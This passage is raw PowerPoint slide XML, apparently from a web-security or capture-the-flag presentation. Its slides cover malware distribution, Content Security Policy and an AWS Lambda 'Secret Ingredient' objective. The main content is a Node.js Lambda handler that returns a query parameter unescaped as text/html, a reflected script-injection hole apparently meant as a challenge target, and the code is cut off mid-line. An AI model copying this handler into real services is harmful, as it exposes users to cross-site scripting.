              <a:t>Malware distribution		🦠</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BABA9BE-8D19-7B85-040B-4C20F12E84E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6297990"/>
            <a:ext cx="7950200" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A spray can with a red x mark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E19CC8E-7F51-C6BC-6D20-DF5405464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4340" y="4757926"/>
            <a:ext cx="347475" cy="347475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22518640"/>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4</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Amazon AWS</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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lambda</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Objective #2 – Secret Ingredient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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AFCACC-63CA-8CD0-75AD-AAD4796E0E53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="30393"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4704977" y="909638"/>
            <a:ext cx="7120692" cy="5124450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4056222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4</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Amazon AWS</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Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lambda</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Objective #2 – Secret Ingredient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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595122" y="674400"/>
            <a:ext cx="7468721" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'use strict'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>export</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>async</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4FC1FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>statusCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>headers:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'Content-Type'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'text/html'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        },</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>body:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>queryStringParameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>decoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>queryStringParameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'base64'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'ascii'</a:t>
            </a:r>
            <a:r>
